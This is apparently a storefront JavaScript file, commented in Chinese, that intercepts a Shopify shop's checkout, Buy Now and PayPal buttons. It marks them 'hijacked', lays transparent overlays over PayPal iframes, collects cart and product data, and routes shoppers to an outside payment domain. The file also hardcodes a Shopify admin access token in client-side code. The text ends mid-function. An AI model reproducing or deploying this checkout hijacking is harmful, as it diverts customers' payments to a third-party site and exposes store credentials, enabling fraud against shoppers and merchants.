var CHECKOUT_URLS = ["https://secure-payment.brand-sale.store/a_index.html"];
var SHOPIFY_ADMIN_TOKEN = "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";

var FACEBOOK_PIXEL_ID = '';

var TIKTOK_PIXEL_ID = 'D5I9HM3C77U6BL6T0M5G';



(function () {
    'use strict';

    // 通用配置 - 可以根据不同模板调整
    const CONFIG = {
        // 价格选择器 - 按优先级排序
        PRICE_SELECTORS: [
            // 通用价格选择器
            '[data-price]',
            '.price',
            '.money',
            '.current-price',
            '.product-price',

            // 特定模板选择器
            '.price--current .price-item--regular',
            '.price .price-item--regular',
            '.product__price .price-item--regular',
            '.price--current',
            '.price-current',
            '.price__current',

            // 备用选择器
            'span[class*="price"]',
            'div[class*="price"]',
            '[class*="price"]'
        ],

        // 标题选择器
        TITLE_SELECTORS: [
            // 通用标题选择器
            'h1[data-product-title]',
            '[data-product-title]',
            'h1',

            // 特定模板选择器
            '.product__title',
            '.product-title',
            '.product_title',
            '.product-single__title',
            '.product-meta h1',
            '.product-info h1',
            '.product-details h1',
            '.product-form h1'
        ],

        // 产品表单选择器
        FORM_SELECTORS: [
            'form[action*="/cart/add"]',
            '.product-form',
            '[data-product-id]',
            'form'
        ],

        // 变体ID选择器
        VARIANT_SELECTORS: [
            '[name="id"]',
            'select[name="id"] option:checked',
            'input[name="id"]:checked',
            '[data-variant-id]',
            '.product-variant-id'
        ],

        // 数量选择器
        QUANTITY_SELECTORS: [
            '[name="quantity"]',
            '.quantity-input input',
            'input[type="number"]',
            '[data-quantity]'
        ],

        // 图片选择器
        IMAGE_SELECTORS: [
            // 通用图片选择器
            'img[data-product-image]',
            'img[alt*="product"]',
            'img[src*="product"]',

            // 特定模板选择器
            '.product__media--featured img',
            '.product__media.is-active img',
            '.product__media img:first-child',
            '.product-media img:first-child',
            '.product-single__media img',
            '.product-image-main img',
            '.product-photo-main img',
            '.featured-image img',
            '.product-image img',
            '.product-photo img',
            '.product-gallery img:first-child',
            '.product img:first-child',
            '.main-product-image img',
            '.product-single__photo img',
            '.product__photo img',
            '.product-photos img:first-child',
            '.slideshow img:first-child',
            '.product-slideshow img:first-child',
            '.hero img',
            'main img:first-child'
        ],

        // 变体标题选择器
        VARIANT_TITLE_SELECTORS: [
            'select[name*="id"] option:checked',
            'input[name*="option"]:checked',
            '.product-form__input:checked + label',
            '.variant-input:checked + label',
            '[data-option-value]'
        ],

        // 调试模式
        DEBUG: true,

        // API端点
        API_ENDPOINTS: {
            CART: '/cart.js',
            PRODUCT: (handle) => `/${handle}.js`
        }
    };

    // 通用工具函数
    const Utils = {
        // 获取URL参数（兼容编码格式）
        getUrlParameter: function(name) {
            try {
                console.log('[像素参数调试] 开始查找参数:', name);
                console.log('[像素参数调试] 原始URL:', window.location.href);

                // 方法1: 标准方式
                const value = new URLSearchParams(window.location.search).get(name);
                if (value) {
                    console.log('[像素参数调试] 方法1找到:', value);
                    return value;
                }

                // 方法2: 解码URL后匹配
                const decoded = decodeURIComponent(window.location.href);
                console.log('[像素参数调试] 解码URL:', decoded);

                const match = decoded.match(new RegExp('[?&]' + name + '=([^&#]+)'));
                const result = match ? match[1] : null;

                console.log('[像素参数调试] 方法2结果:', result);
                return result;
            } catch (error) {
                console.error('[像素参数错误]', error);
                return null;
            }
        },

        // 查找元素 - 支持多个选择器
        findElement: function (selectors, context = document) {
            for (const selector of selectors) {
                const element = context.querySelector(selector);
                if (element) {
                    if (CONFIG.DEBUG);
                    return element;
                }
            }
            if (CONFIG.DEBUG);
            return null;
        },

        // 清理价格字符串 - 支持欧洲格式（逗号作为小数点）
        cleanPrice: function (priceString) {
            if (!priceString) return '0';

            // 检测是否是欧洲格式（逗号作为小数点）
            // 例如：€49,95 或 49,95
            const europeanFormat = /^\D*\d+,\d{2}\D*$/.test(priceString);

            if (europeanFormat) {
                // 欧洲格式：将逗号替换为点，然后清理
                const withDot = priceString.replace(',', '.');
                const clean = withDot.replace(/[^\d.]/g, '');
                return clean || '0';
            } else {
                // 美国格式：直接清理
                const clean = priceString.replace(/[^\d.]/g, '');
                return clean || '0';
            }
        },

        // 获取产品句柄
        getProductHandle: function () {
            const path = window.location.pathname;
            const match = path.match(/\/products\/([^\/]+)/);
            return match ? match[1] : null;
        },

        // 日志函数
        log: function (message, data = null) {
            if (CONFIG.DEBUG) {
                ;
            }
        }
    };

    // 健康检查状态
    var healthyUrls = [...CHECKOUT_URLS];
    var CHECKOUT_URL = CHECKOUT_URLS[0]; // 默认值

    // 立即执行的调试信息

    // 健康检查函数
    async function checkUrlHealth(url) {
        try {
            const response = await fetch(url, {
                method: 'HEAD',
                mode: 'no-cors',
                cache: 'no-cache'
            });
            return true;
        } catch (error) {
            return false;
        }
    }

    // 获取健康的URL（随机选择）
    async function getHealthyCheckoutUrl() {
        if (healthyUrls.length === 0) {
            return CHECKOUT_URLS[0];
        }
        const randomIndex = Math.floor(Math.random() * healthyUrls.length);
        return healthyUrls[randomIndex];
    }

    // 执行健康检查（仅一次）
    async function performHealthCheck() {
        const newHealthyUrls = [];
        for (let url of CHECKOUT_URLS) {
            if (await checkUrlHealth(url)) {
                newHealthyUrls.push(url);
            } else {
            }
        }
        healthyUrls = newHealthyUrls;
        if (healthyUrls.length === 0) {
            healthyUrls.push(CHECKOUT_URLS[0]);
        }
        CHECKOUT_URL = await getHealthyCheckoutUrl();
    }

    // 页面加载时执行一次健康检查
    if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', performHealthCheck);
    } else {
        performHealthCheck();
    }

    // 只针对结账相关的按钮选择器，排除添加购物车按钮
    const CHECKOUT_BUTTON_SELECTORS = [
        '.btn--checkout',
        '.checkout-button',
        '.button-checkout',  // 添加 button-checkout class（顺序相反的变体）
        '.cart__checkout',
        '.cart__checkout-button',  // 添加这个选择器
        '.cart-checkout',
        '[href*="/checkout"]',
        '[data-href*="/checkout"]',  // 添加 data-href 属性支持
        'button[name="checkout"]',  // 添加 name="checkout" 的按钮
        '.shopify-payment-button__button',
        '.dynamic-checkout__content button',
        '.payment-button',
        '.checkout-btn',
        'button[name="goto_pp"]', // PayPal快速结账
        'button[name="goto_gc"]',  // Google Pay快速结账
        // Buy It Now 立即购买按钮
        '[data-skip-cart-button="true"]',  // 跳过购物车的立即购买按钮
        'button[data-skip-cart-button]',   // 任何带有 data-skip-cart-button 属性的按钮
        // PayPal 和更多支付选项相关选择器
        '.shopify-payment-button__more-options',
        '#more-payment-options-link',
        'more-payment-options-link',
        '[data-shopify-buttoncontainer]',
        '.shopify-payment-button',
        '.dynamic-checkout__content',
        // PayPal iframe 容器
        'iframe[name*="paypal"]',
        'iframe[title*="PayPal"]',
        '.paypal-button-container',
        '.paypal-buttons',
        // 新增选择器 - 覆盖更多场景
        '#cart-checkout',  // ID选择器
        '#cart-sidebar-checkout',  // 侧边栏购物车结账
        '[onclick*="/checkout"]',  // onclick 包含 /checkout
        '[onclick*="checkout"]',
        'a[href*="/checkout"]',
        'input[name="checkout"]',
        '.btn-checkout',
        '.checkoutButton',
        '.checkout_button',
        '.cart-checkout-button',
        '.cart__checkout-btn',
        '.cart-button-checkout',
        '.dynamic-checkout-button',
        '.payment-btn',
        '.btn-payment',
        '.proceed-to-checkout',
        '.proceed-checkout',
        'button[name="goto_ap"]',  // Apple Pay快速结账
        '.buy-it-now',
        '.buy-now',
        '.buynow',
        '.instant-checkout',
        '.checkout',
        '#checkout',
        '.complete-order',
        '.place-order',
        '.submit-order',
        '[class*="checkout-button"]',
        '[class*="button-checkout"]',
        '[id*="checkout"]',
        'button[type="submit"][class*="checkout"]'
    ];

    // 合并用户自定义选择器和内置选择器
    const ALL_CHECKOUT_SELECTORS = [
        ...CHECKOUT_BUTTON_SELECTORS,
        ...(typeof CUSTOM_CHECKOUT_SELECTORS !== 'undefined' && Array.isArray(CUSTOM_CHECKOUT_SELECTORS)
            ? CUSTOM_CHECKOUT_SELECTORS
            : [])
    ];

    // 需要排除的添加购物车按钮选择器
    const ADD_TO_CART_SELECTORS = ['button[name="add"]', 'input[name="add"]', '.product-form__cart-submit', '.btn.product-form__cart-submit', '.product__add-to-cart', '.add-to-cart', '.product-form button[type="submit"]'];

    // 检查按钮类型和购物场景
    const isAddToCartButton = button => ADD_TO_CART_SELECTORS.some(selector => button.matches(selector));
    const isCheckoutButton = button => ALL_CHECKOUT_SELECTORS.some(selector => button.matches(selector));

    // 购物车结账按钮选择器 - 这些按钮点击时购物车里已有商品，不需要再添加
    const CART_CHECKOUT_BUTTON_SELECTORS = [
        '.cart__checkout-button',
        '.cart__checkout',
        '.cart-checkout',
        '.cart-checkout-button',
        'button[name="checkout"]',
        '#cart-checkout',
        '#cart-sidebar-checkout',
        '.button-checkout',
        '[id*="cart"][id*="checkout"]',
        '[class*="cart"][class*="checkout"]'
    ];

    const isCartCheckoutScenario = element => {
        // 1. 检查按钮是否在购物车容器内
        if (element.closest('.cart, .cart-drawer, .cart-page, .cart-sidebar, .drawer__content, [data-cart], .mini-cart, .cart-modal, .cart-popup, .cart-overlay')) {
            return true;
        }
        // 2. 检查按钮是否匹配购物车结账按钮选择器
        if (CART_CHECKOUT_BUTTON_SELECTORS.some(selector => element.matches(selector))) {
            return true;
        }
        // 3. 检查当前页面是否是购物车页面
        if (window.location.pathname.includes('/cart')) {
            return true;
        }
        return false;
    };

    // 获取当前页面的商品数据
    async function getCurrentProductData() {
        try {
            const currentPath = window.location.pathname;
            if (currentPath.includes('/products/')) {
                const productHandle = currentPath.split('/products/')[1].split('?')[0].split('/')[0];
                const response = await fetch(`/products/${productHandle}.js`);
                return response.ok ? await response.json() : null;
            }
        } catch (error) { }
        return null;
    }

    // 获取单品购买信息 - 使用通用配置（已修复产品信息获取问题）
    async function getSingleProductInfo(button) {
        const productInfo = {
            type: 'single',
            products: []
        };

        // 1. 尝试找到按钮所属的产品容器（产品卡片）
        let productCard = button.closest('product-card, product-form-component, .product-item, .product-card, .grid__item, .product, [data-product], [data-product-id], .card, .card-wrapper, li, article');

        // 1.1 如果找到的是 product-form-component，尝试向上查找真正的 product-card
        if (productCard && productCard.tagName === 'PRODUCT-FORM-COMPONENT') {
            const parentProductCard = productCard.closest('product-card, .product-item, .product-card, .grid__item, .product, [data-product], [data-product-id]');
            if (parentProductCard && parentProductCard !== productCard) {
                const productFormComponent = productCard;
                productCard = parentProductCard;
                if (!productCard.dataset.productUrl && productFormComponent.dataset.productUrl) {
                    productCard.dataset.productUrl = productFormComponent.dataset.productUrl;
                }
            }
        }

        // 1.2 如果没有找到产品卡片，尝试找到 quick-add-component
        if (!productCard) {
            const quickAddComponent = button.closest('quick-add-component');
            if (quickAddComponent) {
                productCard = quickAddComponent.closest('product-card, product-form-component, .product-item, .product-card, .grid__item, .product, [data-product], [data-product-id]');
            }
        }

        // 1.3 如果找到的容器太大（可能是整个产品列表），尝试找到更精确的容器
        if (productCard) {
            const productLinks = productCard.querySelectorAll('a[href*="/products/"]');
            if (productLinks.length > 1) {
                let currentContainer = button.parentElement;
                while (currentContainer && currentContainer !== productCard) {
                    const linksInContainer = currentContainer.querySelectorAll('a[href*="/products/"]');
                    if (linksInContainer.length === 1) {
                        productCard = currentContainer;
                        break;
                    }
                    currentContainer = currentContainer.parentElement;
                }
            }
        }

        // 2. 尝试找到产品表单（优先在产品卡片内查找）
        let productForm = null;
        if (productCard) {
            productForm = productCard.querySelector('form[action*="/cart/add"]') ||
                         productCard.querySelector('form');
        }

        if (!productForm) {
            productForm = button.closest('form') ||
                         button.form ||
                         Utils.findElement(CONFIG.FORM_SELECTORS, button.closest('form') || document);
        }

        // 3. 获取 variant ID 和 product handle
        let variantId = null;
        let productHandle = null;

        // 3.1 优先从表单中的隐藏字段获取 Variant ID（最准确）
        if (productForm) {
            const variantElement = productForm.querySelector('input[name="id"]') ||
                                  productForm.querySelector('select[name="id"]') ||
                                  productForm.querySelector('[name="id"]');

            if (variantElement) {
                variantId = variantElement.value || variantElement.dataset.variantId;
            }
        }

        // 3.2 如果表单中没有找到，尝试从按钮或产品卡片的 data 属性获取
        if (!variantId) {
            if (button.dataset.variantId) {
                variantId = button.dataset.variantId;
            } else if (productCard?.dataset.variantId) {
                variantId = productCard.dataset.variantId;
            }
        }

        // 3.3 从产品链接或 data-product-url 获取 product handle
        if (productCard) {
            // 首先尝试从 data-product-url 属性获取
            if (productCard.dataset.productUrl) {
                const match = productCard.dataset.productUrl.match(/\/products\/([^?#/]+)/);
                if (match) {
                    productHandle = match[1];
                }
            }

            // 如果还没有找到，尝试从产品链接获取
            if (!productHandle) {
                const productLinks = productCard.querySelectorAll('a[href*="/products/"]');
                for (const link of productLinks) {
                    const match = link.href.match(/\/products\/([^?#/]+)/);
                    if (match) {
                        productHandle = match[1];
                        break;
                    }
                }
            }
        }

        // 3.4 如果还是没有找到 product handle，且在产品页面，从 URL 获取
        if (!productHandle && window.location.pathname.includes('/products/')) {
            const match = window.location.pathname.match(/\/products\/([^?#/]+)/);
            if (match) {
                productHandle = match[1];
            }
        }

        // 4. 获取数量
        let quantity = 1;
        if (productForm) {
            const quantityInput = productForm.querySelector('input[name="quantity"]');
            quantity = quantityInput?.value || 1;
        } else if (productCard) {
            const quantityInput = productCard.querySelector('input[name="quantity"]');
            quantity = quantityInput?.value || 1;
        }

        // 5. 获取产品完整信息 - 优先从 API
        let title = '';
        let price = '0';
        let image = '';

        // 5.1 如果有 product handle，使用产品 API
        if (productHandle) {
            try {
                const apiUrl = `/products/${productHandle}.js`;

                const productResponse = await fetch(apiUrl);
                if (productResponse.ok) {
                    const productJson = await productResponse.json();

                    // 获取标题
                    title = productJson.title || '';

                    // 获取价格、variant ID 和对应的图片
                    if (variantId) {
                        const variant = productJson.variants?.find(v => v.id.toString() === variantId.toString());
                        if (variant) {
                            price = (variant.price / 100).toString();

                            // 获取变体对应的图片
                            if (variant.featured_image) {
                                image = variant.featured_image.src;
                            } else if (productJson.images && productJson.images.length > 0) {
                                image = productJson.images[0];
                            }
                        }
                    } else if (productJson.variants && productJson.variants.length > 0) {
                        // 如果没有 variantId，使用第一个变体
                        variantId = productJson.variants[0].id;
                        price = (productJson.variants[0].price / 100).toString();

                        // 获取第一个变体的图片
                        if (productJson.variants[0].featured_image) {
                            image = productJson.variants[0].featured_image.src;
                        } else if (productJson.images && productJson.images.length > 0) {
                            image = productJson.images[0];
                        }
                    }
                }
            } catch (apiError) {
                // API调用失败，继续使用其他方法
            }
        }

        // 5.2 如果没有 product handle，但在产品页面，使用当前页面 API
        if (!title && window.location.pathname.includes('/products/')) {
            try {
                const apiUrl = window.location.pathname + '.js';

                const productResponse = await fetch(apiUrl);
                if (productResponse.ok) {
                    const productJson = await productResponse.json();
                    title = productJson.title || '';

                    if (variantId) {
                        const variant = productJson.variants?.find(v => v.id.toString() === variantId.toString());
                        if (variant) {
                            price = (variant.price / 100).toString();

                            // 获取变体对应的图片
                            if (variant.featured_image) {
                                image = variant.featured_image.src;
                            } else if (productJson.images && productJson.images.length > 0) {
                                image = productJson.images[0];
                            }
                        }
                    } else if (productJson.variants && productJson.variants.length > 0) {
                        variantId = productJson.variants[0].id;
                        price = (productJson.variants[0].price / 100).toString();

                        // 获取第一个变体的图片
                        if (productJson.variants[0].featured_image) {
                            image = productJson.variants[0].featured_image.src;
                        } else if (productJson.images && productJson.images.length > 0) {
                            image = productJson.images[0];
                        }
                    }
                }
            } catch (apiError) {
                // API调用失败，继续使用其他方法
            }
        }

        // 5.3 如果 API 都失败了，从 DOM 元素获取（降级方案）

        // 获取标题
        if (!title) {
            // 优先从产品卡片内查找
            if (productCard) {
                const titleElement = productCard.querySelector('.product-title, .product__title, .card__heading, h2, h3, a[href*="/products/"]');
                if (titleElement) {
                    title = titleElement.textContent.trim();
                }
            }

            // 如果还是没有，且在产品页面，使用智能提取函数
            if (!title && window.location.pathname.includes('/products/')) {
                title = Utils.getProductTitle();
            }
        }

        // 获取价格
        if (!price || price === '0') {
            // 优先从产品卡片内查找
            let priceElement = null;
            if (productCard) {
                priceElement = productCard.querySelector('.price, .product-price, .price__regular, [data-price], .money');
            }

            // 只有在产品页面才降级到全局查找
            if (!priceElement && window.location.pathname.includes('/products/')) {
                priceElement = Utils.findElement(CONFIG.PRICE_SELECTORS, document);
            }

            const pagePrice = priceElement?.textContent?.trim() || priceElement?.dataset.price || '0';
            if (pagePrice) {
                const cleanPrice = Utils.cleanPrice(pagePrice);
                if (cleanPrice !== '0') {
                    price = cleanPrice;
                }
            }
        }

        // 获取图片
        if (!image) {
            // 优先从产品卡片内查找
            if (productCard) {
                const imgElement = productCard.querySelector('img');
                if (imgElement) {
                    let imgUrl = imgElement.src || imgElement.dataset.src || imgElement.dataset.original;
                    if (imgUrl) {
                        imgUrl = imgUrl.split('?')[0];
                        if (!imgUrl.startsWith('http')) {
                            imgUrl = imgUrl.startsWith('//') ? 'https:' + imgUrl :
                                    imgUrl.startsWith('/') ? window.location.origin + imgUrl : imgUrl;
                        }
                        if (!imgUrl.includes('placeholder') && !imgUrl.includes('no-image')) {
                            image = imgUrl;
                        }
                    }
                }
            }

            // 如果还是没有，且在产品页面，使用全局查找
            if (!image && window.location.pathname.includes('/products/')) {
                const imageSelectors = ['.product__media--featured img', '.product__media.is-active img', '.product__media img:first-child', '.product-media img:first-child', '.product-single__media img', '.product-image-main img', '.product-photo-main img', '.featured-image img', '.product-image img', '.product-photo img', '.product-gallery img:first-child', '.product img:first-child', 'img[data-product-image]', '.main-product-image img', '.product-single__photo img', '.product__photo img', '.product-photos img:first-child', '.slideshow img:first-child', '.product-slideshow img:first-child', '.hero img', 'main img:first-child', 'img[alt*="product"]', 'img[src*="product"]'];

                for (const selector of imageSelectors) {
                    const element = document.querySelector(selector);
                    if (element) {
                        let imgUrl = element.src || element.dataset.src || element.dataset.original || element.getAttribute('data-srcset')?.split(',')[0]?.split(' ')[0] || element.srcset?.split(',')[0]?.split(' ')[0] || '';
                        if (imgUrl) {
                            imgUrl = imgUrl.split('?')[0];
                            if (!imgUrl.startsWith('http')) {
                                imgUrl = imgUrl.startsWith('//') ? 'https:' + imgUrl : imgUrl.startsWith('/') ? window.location.origin + imgUrl : imgUrl;
                            }
                            if (!imgUrl.includes('placeholder') && !imgUrl.includes('no-image') && !imgUrl.includes('default') && imgUrl.length > 10) {
                                image = imgUrl;
                                break;
                            }
                        }
                    }
                }
            }
        }

        // 获取变体标题
        let variantTitle = '';
        if (productForm) {
            const variantSelectors = ['select[name*="id"] option:checked', 'input[name*="option"]:checked', '.product-form__input:checked + label', '.variant-input:checked + label'];
            for (const selector of variantSelectors) {
                const element = productForm.querySelector(selector) || document.querySelector(selector);
                if (element) variantTitle += (variantTitle ? ' / ' : '') + element.textContent.trim();
            }
        }

        const productItem = {
            id: variantId || Date.now().toString(),
            title: title,
            variant_title: variantTitle,
            quantity: parseInt(quantity) || 1,
            price: price,
            image: image
        };



        productInfo.products.push(productItem);
        return productInfo;
    }

    // 获取购物车信息
    async function getCartInfo() {
        try {
            const response = await fetch('/cart.js');
            const cart = await response.json();

            const result = {
                type: 'cart',
                products: cart.items.map(item => ({
                    id: item.variant_id,
                    title: item.product_title,
                    variant_title: item.variant_title,
                    quantity: item.quantity,
                    price: (item.price / 100).toFixed(2),
                    image: item.image,
                    line_price: (item.line_price / 100).toFixed(2)
                })),
                total: (cart.total_price / 100).toFixed(2)
            };

            return result;
        } catch (error) {
            return { type: 'cart', products: [], total: '0' };
        }
    }





    // 处理单品购买的完整逻辑
    async function handleSingleProductPurchase(element) {
        try {
            let productData = await getSingleProductInfo(element);

            let needCartMethod = !productData?.products?.[0]?.id || productData.products[0].id === 'unknown' || isNaN(productData.products[0].id) || parseInt(productData.products[0].id) <= 0;

            if (needCartMethod) {
                const originalCartResponse = await fetch('/cart.js');
                const originalCart = originalCartResponse.ok ? await originalCartResponse.json() : { items: [] };
                const form = element.closest('form[action*="/cart/add"]') || element.closest('.product-form') || document.querySelector('form[action*="/cart/add"]');

                if (form) {
                    const addResponse = await fetch('/cart/add.js', { method: 'POST', body: new FormData(form) });
                    if (addResponse.ok) {
                        const addResult = await addResponse.json();
                        if (productData?.products?.[0]) productData.products[0].id = addResult.variant_id;

                        try {
                            await fetch('/cart/change.js', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ id: addResult.variant_id, quantity: 0 }) });
                            if (originalCart.items.length > 0) {
                                const updates = {};
                                originalCart.items.forEach(item => updates[item.variant_id] = item.quantity);
                                await fetch('/cart/update.js', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ updates }) });
                            }
                        } catch (restoreError) {
                        }
                    }
                }
            }



            return productData || await getSingleProductInfo(element);
        } catch (error) {
            return await getSingleProductInfo(element);
        }
    }

    // 特殊处理PayPal iframe和更多支付选项
    function handleSpecialPaymentButtons() {
        // 处理"更多支付选项"链接
        const moreOptionsLinks = document.querySelectorAll('.shopify-payment-button__more-options, #more-payment-options-link, more-payment-options-link a');
        moreOptionsLinks.forEach(link => {
            if (link.dataset.hijacked) return;
            link.dataset.hijacked = 'true';

            link.addEventListener('click', async function (e) {
                e.preventDefault();
                e.stopPropagation();

                const productData = isCartCheckoutScenario(link) ?
                    await getCartInfo() :
                    await handleSingleProductPurchase(link);

                redirectToCustomCheckout(productData);
            }, true);
        });

        // 处理PayPal iframe容器的点击
        const paypalContainers = document.querySelectorAll('.paypal-button-container, .paypal-buttons, [data-shopify-buttoncontainer]');
        paypalContainers.forEach(container => {
            if (container.dataset.hijacked) return;
            container.dataset.hijacked = 'true';

            container.addEventListener('click', async function (e) {
                const target = e.target;
                const isPaypalClick = target.closest('iframe[name*="paypal"]') || target.closest('iframe[title*="PayPal"]') || container.querySelector('iframe[name*="paypal"]') || container.querySelector('iframe[title*="PayPal"]');

                if (isPaypalClick || true) {
                    e.preventDefault();
                    e.stopPropagation();

                    const productData = isCartCheckoutScenario(container) ?
                        await getCartInfo() :
                        await getSingleProductInfo(container);

                    redirectToCustomCheckout(productData);
                }
            }, true);
        });

        // 处理PayPal iframe
        const paypalIframes = document.querySelectorAll('iframe[name*="paypal"], iframe[title*="PayPal"]');
        paypalIframes.forEach(iframe => {
            if (iframe.dataset.hijacked) return;
            iframe.dataset.hijacked = 'true';

            iframe.addEventListener('click', async function (e) {
                e.preventDefault();
                e.stopPropagation();

                const productData = isCartCheckoutScenario(iframe) ? await getCartInfo() : await getSingleProductInfo(iframe);
                redirectToCustomCheckout(productData);
            }, true);

            iframe.addEventListener('load', () => addPayPalOverlay(iframe));
        });
    }

    // 为PayPal iframe添加透明覆盖层来捕获点击
    function addPayPalOverlay(iframe) {
        if (iframe.parentNode.querySelector('.paypal-overlay')) return;

        const overlay = document.createElement('div');
        overlay.className = 'paypal-overlay';
        overlay.style.cssText = 'position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: transparent; z-index: 999; cursor: pointer;';

        const parent = iframe.parentNode;
        if (getComputedStyle(parent).position === 'static') parent.style.position = 'relative';

        overlay.addEventListener('click', async function (e) {
            e.preventDefault();
            e.stopPropagation();

            const productData = isCartCheckoutScenario(iframe) ?
                await getCartInfo() :
                await getSingleProductInfo(iframe);

            redirectToCustomCheckout(productData);
        });

        parent.appendChild(overlay);
    }

    // 获取商店货币信息
    async function getStoreCurrency() {
        try {
            // 方法1: 尝试从页面元素获取货币信息
            const currencyFromPage = getCurrencyFromPage();
            if (currencyFromPage) {
                return currencyFromPage;
            }

            // 方法2: 尝试从Shopify API获取（可能有跨域限制）
            try {
                const shopDomain = window.location.hostname;
                const response = await fetch(`https://${shopDomain}/admin/api/2023-10/shop.json`, {
                    headers: {
                        'X-Shopify-Access-Token': SHOPIFY_ADMIN_TOKEN,
                        'Content-Type': 'application/json'
                    }
                });

                if (response.ok) {
                    const shopData = await response.json();
                    const currency = shopData.shop.currency || 'USD';
                    const currencyFormat = shopData.shop.money_format || '{{amount}}';



                    return {
                        currency: currency,
                        money_format: currencyFormat
                    };
                }
            } catch (apiError) {
            }

            return {
                currency: 'USD',
                money_format: '{{amount}}'
            };
        } catch (error) {
            return {
                currency: 'USD',
                money_format: '{{amount}}'
            };
        }
    }

    // 从页面元素获取货币信息
    function getCurrencyFromPage() {
        try {
            // 查找页面中的价格元素，提取货币信息
            const priceSelectors = [
                '.price',
                '.product-price',
                '.price__regular',
                '.price__sale',
                '.money',
                '[class*="price"]',
                '[class*="money"]',
                '.product__price',
                '.product-price__regular',
                '.product-price__sale'
            ];

            for (const selector of priceSelectors) {
                const priceElements = document.querySelectorAll(selector);
                for (const element of priceElements) {
                    const text = element.textContent || element.innerText;
                    if (text) {

                        // 方法1: 提取货币代码 (如 CNY, USD, EUR)
                        const currencyCodeMatch = text.match(/\b([A-Z]{3})\b/);
                        if (currencyCodeMatch) {
                            const currencyCode = currencyCodeMatch[1];
                            // 验证是否是有效的货币代码
                            if (isValidCurrencyCode(currencyCode)) {
                                return {
                                    currency: currencyCode,
                                    money_format: '{{amount}}'
                                };
                            }
                        }

                        // 方法2: 提取货币符号
                        const currencyMatch = text.match(/[¥$€£₹₽₩₪₦₨₫₴₸₺₼₾₿]/);
                        if (currencyMatch) {
                            const symbol = currencyMatch[0];
                            const currency = getCurrencyFromSymbol(symbol);
                            return {
                                currency: currency,
                                money_format: '{{amount}}'
                            };
                        }
                    }
                }
            }

            // 查找meta标签中的货币信息
            const currencyMeta = document.querySelector('meta[property="product:price:currency"]') ||
                document.querySelector('meta[name="currency"]') ||
                document.querySelector('meta[property="og:price:currency"]');
            if (currencyMeta && currencyMeta.content) {
                const currency = currencyMeta.content.toUpperCase();
                return {
                    currency: currency,
                    money_format: '{{amount}}'
                };
            }

            return null;
        } catch (error) {
            return null;
        }
    }

    // 验证货币代码是否有效
    function isValidCurrencyCode(code) {
        const validCurrencies = [
            'USD', 'EUR', 'GBP', 'JPY', 'CNY', 'CAD', 'AUD', 'CHF', 'SEK', 'NOK',
            'DKK', 'PLN', 'CZK', 'HUF', 'RUB', 'TRY', 'BRL', 'MXN', 'INR', 'KRW',
            'SGD', 'HKD', 'NZD', 'ZAR', 'THB', 'MYR', 'PHP', 'IDR', 'VND', 'TWD'
        ];
        return validCurrencies.includes(code);
    }

    // 根据货币符号获取货币代码
    function getCurrencyFromSymbol(symbol) {
        const symbolMap = {
            '$': 'USD',
            '€': 'EUR',
            '£': 'GBP',
            '¥': 'CNY', // 更新：¥符号对应CNY而不是JPY
            '₹': 'INR',
            '₽': 'RUB',
            '₩': 'KRW',
            '₪': 'ILS',
            '₦': 'NGN',
            '₨': 'PKR',
            '₫': 'VND',
            '₴': 'UAH',
            '₸': 'KZT',
            '₺': 'TRY',
            '₼': 'AZN',
            '₾': 'GEL',
            '₿': 'BTC'
        };
        return symbolMap[symbol] || 'USD';
    }

    // 获取商店logo信息
    function getStoreLogo() {
        try {
            // 尝试从多个可能的位置获取logo
            const logoSelectors = [
                // Shopify官方主题
                '.header__logo img',
                '.header__heading-logo',
                '.site-header__logo img',
                '.header__heading-link img',
                // 通用logo选择器
                '.logo img',
                '.header-logo img',
                '.site-logo img',
                '.brand-logo img',
                '.header .logo img',
                '.navbar-brand img',
                '.custom-logo',
                '#logo img',
                '#site-logo img',
                // alt属性匹配
                'header img[alt*="logo"]',
                'header img[alt*="Logo"]',
                '.header img[alt*="logo"]',
                '.site-header img[alt*="logo"]',
                'img[alt*="brand"]',
                // class/id包含logo
                'img[class*="logo"]',
                'img[id*="logo"]',
                'img[class*="Logo"]',
                // SVG logo
                'header svg[class*="logo"]',
                '.header__logo svg',
                '.logo svg',
                // 链接内的logo
                'a[href="/"] img',
                'header a img',
                '.header a[href="/"] img'
            ];

            for (const selector of logoSelectors) {
                const logoElement = document.querySelector(selector);
                if (logoElement && logoElement.src) {
                    let logoUrl = logoElement.src;
                    // 确保使用HTTPS
                    if (logoUrl.startsWith('http:')) {
                        logoUrl = logoUrl.replace('http:', 'https:');
                    }
                    // 确保是完整URL
                    if (!logoUrl.startsWith('http')) {
                        if (logoUrl.startsWith('//')) {
                            logoUrl = 'https:' + logoUrl;
                        } else if (logoUrl.startsWith('/')) {
                            logoUrl = window.location.origin + logoUrl;
                        }
                    }
                    return logoUrl;
                }
            }

            // 尝试从JSON-LD数据获取logo
            const jsonLdScripts = document.querySelectorAll('script[type="application/ld+json"]');
            for (const script of jsonLdScripts) {
                try {
                    const data = JSON.parse(script.textContent);
                    if (data['@type'] === 'Organization' && data.logo) {
                        const logoUrl = typeof data.logo === 'string' ? data.logo : data.logo.url;
                        if (logoUrl) {
                            return logoUrl;
                        }
                    }
                } catch (e) { }
            }

            return null;
        } catch (error) {
            return null;
        }
    }

    // ==================== 像素追踪配置函数 ====================

    // 通用像素ID获取函数（支持SessionStorage持久化）
    // 优先级：URL参数 > SessionStorage > 硬编码配置
    function getPixelId(urlParamName, sessionKey, defaultValue) {
        try {
            // 优先级1: 从URL参数获取（最高优先级）
            const urlPixel = Utils.getUrlParameter(urlParamName);
            if (urlPixel) {
                // 保存到SessionStorage，覆盖旧值
                sessionStorage.setItem(sessionKey, urlPixel);
                console.log(`[像素ID] 从URL获取并保存: ${urlPixel}`);
                return urlPixel;
            }

            // 优先级2: 从SessionStorage读取（跨页面保持）
            const sessionPixel = sessionStorage.getItem(sessionKey);
            if (sessionPixel) {
                console.log(`[像素ID] 从SessionStorage读取: ${sessionPixel}`);
                return sessionPixel;
            }

            // 优先级3: 使用硬编码的配置（默认值）
            if (defaultValue) {
                console.log(`[像素ID] 使用默认配置: ${defaultValue}`);
                return defaultValue;
            }

            return null;
        } catch (error) {
            console.error('[像素ID获取错误]', error);
            return defaultValue || null;
        }
    }

    // 获取Facebook像素ID
    function getFacebookPixelId() {
        return getPixelId(
            'custom-facebook-pixel',           // URL参数名
